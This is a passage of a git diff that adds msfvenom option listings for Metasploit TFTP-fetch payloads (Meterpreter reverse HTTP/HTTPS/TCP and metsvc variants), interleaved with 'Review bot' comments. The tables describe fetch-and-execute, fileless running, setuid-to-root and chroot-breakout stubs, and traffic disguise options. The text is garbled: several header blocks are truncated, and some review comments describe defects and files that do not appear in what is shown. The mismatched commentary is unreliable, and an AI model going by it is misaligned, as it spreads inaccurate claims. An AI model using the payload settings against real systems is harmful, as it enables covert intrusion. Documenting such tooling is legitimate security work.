false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..24707cc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_http.txt 
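Review bot: the committed defaults include per-run random values, so these files will change every time they are regenerated: `FETCH_FILENAME` is `RsvPATWCwhOw` here and `ZghrjpqncEbT` in the previous file for an otherwise identical option set. Consider masking such values with a fixed placeholder (for example `RANDOM`) in the generator so future diffs show only real option changes. The header problems of the previous file recur: `Rank:` is present but empty, and the contributor names (`skape`, `egypt`, `OJ Reeves`) sit under the Evasion options banner without a `Provided by:` heading.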
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YBJaPeOj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1060d1a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_https.txt 
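Review bot: the `HttpUnknownRequestResponse` row is broken: its value is spread over several lines and only `It works!` survives between blank lines, so the option's default (described on the same row as an HTML response body) does not round-trip and the Name/Setting/Required/Description columns no longer line up for that row. Keep the value on one line, escaping the markup if the generator cannot, and verify the row parses like its neighbours. Two smaller points on the same table: the `HttpUserAgent` default is chosen at random per run (an iPad Safari string here, a Firefox string in the HTTPS file), the same regeneration churn as `FETCH_FILENAME`; and `Max parameter length: 255 characters` is appended to the description text instead of being kept as a separate field.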
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tkjNigsUqdJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fa9bbda --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter_reverse_tcp.txt 
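Review bot: the same broken `HttpUnknownRequestResponse` row as in the HTTP file appears here, and in addition the `PayloadUUIDSeed` row is split mid-description (`A string to use when generating the payload` / `UUID (deterministic)`), so two rows of this table no longer follow the one-row-per-line layout. Rejoin both before merging; for the HTTPS variant in particular, the TLS rows (`SSLVersion Auto`, `StagerVerifySSLCert false`, `HandlerSSLCert`) are the ones readers of this reference will compare against a handler configuration, so the table needs to parse cleanly.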
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ynHQURpcEiz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..f895b4b --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt 
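Review bot: in the `meterpreter_reverse_tcp` file the `MeterpreterTryToFork` row is wrapped mid-description (`Fork a new process if the` / `functionality is available`); rejoin it so the table stays one row per line. This file does show an intact `Provided by:` block (Brendan Watters, Spencer McIntyre, Adam Cammack, Brent Cook, timwr) and a populated `Rank: Normal`, which is the shape the damaged header blocks in the `reverse_tcp` and `reverse_tcp_uuid` files should be restored to when they are regenerated.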
@@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/tftp/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YntZRPaQmR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number 
of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..610f07a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt 
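Review bot: the FETCH_FILENAME default in the "When FETCH_FILELESS is none" table (YntZRPaQmR) is a per-run random string, so every regeneration of cmd-linux-tftp-x86-metsvc_bind_tcp.txt will produce a spurious one-line diff there (the sibling files in this set each show a different value for the same reason). Suggest having the generator normalize that cell to a fixed placeholder before the file is committed, or documenting in the repository that this line is expected to churn, so reviewers can tell a real option change from noise.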
@@ -0,0 +1,98 @@ + + Name: TFTP Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HvRAoedhhd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp 
even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt new file mode 100644 index 0000000..8bac663 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt 
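Review bot: in the Basic options table of cmd-linux-tftp-x86-metsvc_reverse_tcp.txt, FETCH_COMMAND shows "CURL" as the Current Setting although the module lives under payload/cmd/linux/tftp; worth confirming whether msfvenom prints the adapter's generic default here or whether the dump was taken with the wrong module selected, and recording the answer in the commit message, since a reader of this file would otherwise assume the tftp variant fetches with curl. Related: FETCH_SRVHOST is Required "no" in this reverse variant but "yes" in the bind variant above; if that is intentional (the reverse payload already has LHOST), a one-line note would keep it from being read as a copy error.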
